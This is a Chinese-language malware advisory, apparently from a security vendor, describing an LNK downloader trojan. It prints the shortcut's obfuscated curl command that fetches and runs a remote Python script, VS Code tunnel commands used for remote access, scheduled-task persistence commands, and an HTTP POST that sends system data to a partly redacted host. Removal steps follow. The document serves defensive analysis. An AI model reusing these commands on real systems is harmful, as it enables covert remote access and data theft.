Trojan.LNK.DOWNLOADER.D
2024年10月2日
:
HEUR:Trojan.WinLNK.Agent.gen (KASPERSKY)
平台:
Windows
总體(tǐ)风险等级:
潜在破坏:
潜在分(fēn)布:
感染次数:
信息暴露:
恶意软件类型:
Trojan
有(yǒu)破坏性?:
没有(yǒu)
加密?:
In the Wild:
是的
概要
感染途徑: 从互联网上下载, 下载了其他(tā)恶意软件
它以文(wén)件的形式出现在系统中(zhōng),可(kě)能(néng)是其他(tā)恶意软件投放的,或者是用(yòng)户在访问恶意网站时无意中(zhōng)下载的。
技(jì )术详细信息
文(wén)件大小(xiǎo): 2,044 bytes
报告日期: LNK
初始樣本接收日期: 2024年9月30日
Payload: 植入文(wén)件, 连接到 URL/Ip
新(xīn)病毒详细信息
它以文(wén)件的形式出现在系统中(zhōng),可(kě)能(néng)是其他(tā)恶意软件投放的,或者是用(yòng)户在访问恶意网站时无意中(zhōng)下载的。
安(ān)装(zhuāng)
它植入下列文(wén)件:
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\python.zip
- After extracting to %AppDataLocal%\Microsoft\Python:
- _asyncio.pyd
- _bz2.pyd
- _ctypes.pyd
- _decimal.pyd
- _elementtree.pyd
- _hashlib.pyd
- _lzma.pyd
- _msi.pyd
- _multiprocessing.pyd
- _overlapped.pyd
- _queue.pyd
- _socket.pyd
- _sqlite3.pyd
- _ssl.pyd
- _uuid.pyd
- _wmi.pyd
- _zoneinfo.pyd
- libcrypto-3.dll
- libffi-8.dll
- libssl-3.dll
- LICENSE.txt
- pyexpat.pyd
- python.cat
- python.exe
- python.zip
- python3.dll
- python312._pth
- python312.dll
- python312.zip
- pythonw.exe
- select.pyd
- sqlite3.dll
- unicodedata.pyd
- vcruntime140_1.dll
- vcruntime140.dll
- winsound.pyd
- After extracting to %AppDataLocal%\Microsoft\Python:
它添加下列进程:
- "%System%\cmd.exe" /c start msg {Username} "安(ān)裝成功" & c^u^r^l -s -k https://www.{BLOCKED}n.org/ftp/python/3.12.5/python-3.12.5-embed-amd64.zip -o "%AppDataLocal%\Microsoft\python.zip" & timeout 10 & mkdir "%AppDataLocal%\Microsoft\Python" & tar -xf "%AppDataLocal%\Microsoft\python.zip" -C "%AppDataLocal%\Microsoft\Python" & c^u^r^l -s -k https://{BLOCKED}e.ee/r/DQjrd/0 -o "%AppDataLocal%\Microsoft\Python\update.py" & start "" /B "%AppDataLocal%\Microsoft\Python\pythonw.exe" "%AppDataLocal%\Microsoft\Python\update.py"
它创建下列文(wén)件夹:
- %AppDataLocal%\Microsoft\Python
下载例程
它使用(yòng)下列文(wén)件名(míng)保存下载的文(wén)件:
- %AppDataLocal%\Microsoft\python.zip → legitimate Python 3.12.5 x64 zip file
- %AppDataLocal%\Microsoft\Python\update.py → malicious Python code
其他(tā)详细信息
该程序执行以下操作(zuò):
- It sends Windows message "安(ān)裝成功" translated to "Installation successful".
- It downloads a legitimate 64-bit Python 3.12.5 embedded zip file and extracts its contents.
- It downloads a malicious Python script file from a URL and executes using the extracted Python package.
- It requires the following command line tools to proceed with its intended routine:
- curl
- tar
- The executed Python code does the following:
- It fetches running processes using tasklist command.
- It connects to the following URL(s) to download its component file(s):
- https://{BLOCKED}95.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip
- It saves the files it downloads using the following names:
- %AppDataLocal%\Microsoft\vscode.zip → contains a file named code.exe
- It adds the following folders:
- %AppDataLocal%\Microsoft\VSCode
- It extracts the zip file into the created folder with the following filename:
- %AppDataLocal%\Microsoft\VSCode\code.exe
- After extraction, it deletes the previously downloaded zip file.
- It adds the following processes:
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe tunnel --accept-server-license-terms user logout"
- %System%\cmd.exe /c "%AppDataLocal%\Microsoft\VSCode\code.exe --locale en-US tunnel --accept-server-license-terms --name "{Computer Name}"
- Saves the output into the following files:
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- Saves the output into the following files:
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /st 08:00 /sc HOURLY /mo 4 /f
- schtasks /create /tn "MicrosoftHealthcareMonitorNode" /tr "%AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py" /sc ONLOGON /ru SYSTEM /rl HIGHEST /f
- It retrieves the following information from the affected system:
- System Locale
- Computer Name
- Username
- User Domain
- %Program Files% Contents
- %ProgramData% Contents
- %System Root%\Users Contents
- It encodes the collected information into a Base64 format.
- It sends the gathered information via HTTP POST to the following URL:
- http://{BLOCKED}o.com/r/2yxp98b3/{Encoded Base64 String of Collected information}
- It adds the following scheduled tasks:
- If executed as user:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: One time at 8:00 AM on {Scheduled Task Create Time} → After triggered, repeat every 04:00:00 indefinitely.
Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Location: {Root Directory}
- If executed as an administrator:
- Location: {Root Directory}
Name: MicrosoftHealthcareMonitorNode
Trigger: At log on of any user
Action: Start a program → %AppDataLocal%\Microsoft\Python\pythonw.exe %AppDataLocal%\Microsoft\Python\update.py
- Location: {Root Directory}
- If executed as user:
解决方案
最小(xiǎo)扫描引擎: 9.800
First VSAPI Pattern File: 19.624.03
VSAPI 第一样式发布日期: 2024年10月1日
VSAPI OPR样式版本: 19.625.00
VSAPI OPR样式发布日期: 2024年10月2日
Step 1
对于Windows ME和XP用(yòng)户,在扫描前,请确认已禁用(yòng)系统还原功能(néng),才可(kě)全面扫描计算机。
Step 2
注意:在此恶意软件/间谍软件/灰色软件执行期间,并非所有(yǒu)文(wén)件、文(wén)件夹和注册表键值和项都会安(ān)装(zhuāng)到您的计算机上。这可(kě)能(néng)是由于不完整的安(ān)装(zhuāng)或其他(tā)操作(zuò)系统条件所致。如果您没有(yǒu)找到相同的文(wén)件/文(wén)件夹/注册表信息,请继续进行下一步操作(zuò)。
Step 3
重启进入安(ān)全模式
[ 更多(duō) ]
Step 5
搜索和删除这些文(wén)件
[ 更多(duō) ]
有(yǒu)些组件文(wén)件可(kě)能(néng)是隐藏的。请确认在"高级选项"中(zhōng)已选中(zhōng)搜索隐藏文(wén)件和文(wén)件夹复选框,使查找结果包括所有(yǒu)隐藏文(wén)件和文(wén)件夹。 - %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
- %AppDataLocal%\Microsoft\Python\update.py
- %AppDataLocal%\Microsoft\Python\_asyncio.pyd
- %AppDataLocal%\Microsoft\Python\_bz2.pyd
- %AppDataLocal%\Microsoft\Python\_ctypes.pyd
- %AppDataLocal%\Microsoft\Python\_decimal.pyd
- %AppDataLocal%\Microsoft\Python\_elementtree.pyd
- %AppDataLocal%\Microsoft\Python\_hashlib.pyd
- %AppDataLocal%\Microsoft\Python\_lzma.pyd
- %AppDataLocal%\Microsoft\Python\_msi.pyd
- %AppDataLocal%\Microsoft\Python\_multiprocessing.pyd
- %AppDataLocal%\Microsoft\Python\_overlapped.pyd
- %AppDataLocal%\Microsoft\Python\_queue.pyd
- %AppDataLocal%\Microsoft\Python\_socket.pyd
- %AppDataLocal%\Microsoft\Python\_sqlite3.pyd
- %AppDataLocal%\Microsoft\Python\_ssl.pyd
- %AppDataLocal%\Microsoft\Python\_uuid.pyd
- %AppDataLocal%\Microsoft\Python\_wmi.pyd
- %AppDataLocal%\Microsoft\Python\_zoneinfo.pyd
- %AppDataLocal%\Microsoft\Python\libcrypto-3.dll
- %AppDataLocal%\Microsoft\Python\libffi-8.dll
- %AppDataLocal%\Microsoft\Python\libssl-3.dll
- %AppDataLocal%\Microsoft\Python\LICENSE.txt
- %AppDataLocal%\Microsoft\Python\pyexpat.pyd
- %AppDataLocal%\Microsoft\Python\python.cat
- %AppDataLocal%\Microsoft\Python\python.exe
- %AppDataLocal%\Microsoft\Python\python.zip
- %AppDataLocal%\Microsoft\Python\python3.dll
- %AppDataLocal%\Microsoft\Python\python312._pth
- %AppDataLocal%\Microsoft\Python\python312.dll
- %AppDataLocal%\Microsoft\Python\python312.zip
- %AppDataLocal%\Microsoft\Python\pythonw.exe
- %AppDataLocal%\Microsoft\Python\select.pyd
- %AppDataLocal%\Microsoft\Python\sqlite3.dll
- %AppDataLocal%\Microsoft\Python\unicodedata.pyd
- %AppDataLocal%\Microsoft\Python\vcruntime140_1.dll
- %AppDataLocal%\Microsoft\Python\vcruntime140.dll
- %AppDataLocal%\Microsoft\Python\winsound.pyd
- %AppDataLocal%\Microsoft\VSCode\code.exe
- %AppDataLocal%\Microsoft\VSCode\output.txt
- %AppDataLocal%\Microsoft\VSCode\output2.txt
- %AppDataLocal%\Microsoft\python.zip
- %AppDataLocal%\Microsoft\vscode.zip
Step 6
搜索和删除这些文(wén)件夹
[ 更多(duō) ]
请确认在高级选项中(zhōng)已选中(zhōng)搜索隐藏文(wén)件和文(wén)件夹复选框,使查找结果包括所有(yǒu)隐藏文(wén)件夹。; - %AppDataLocal%\Microsoft\Python
- %AppDataLocal%\Microsoft\VSCode
- %AppDataLocal%\Microsoft\Python
- %AppDataLocal%\Microsoft\VSCode
Step 7
重启进入正常模式,使用(yòng)亚信安(ān)全产(chǎn)品扫描计算机,检测Trojan.LNK.DOWNLOADER.D文(wén)件 如果检测到的文(wén)件已被亚信安(ān)全产(chǎn)品清除、删除或隔离,则无需采取进一步措施。可(kě)以选择直接删除隔离的文(wén)件。请参阅知识库页(yè)面了解详细信息。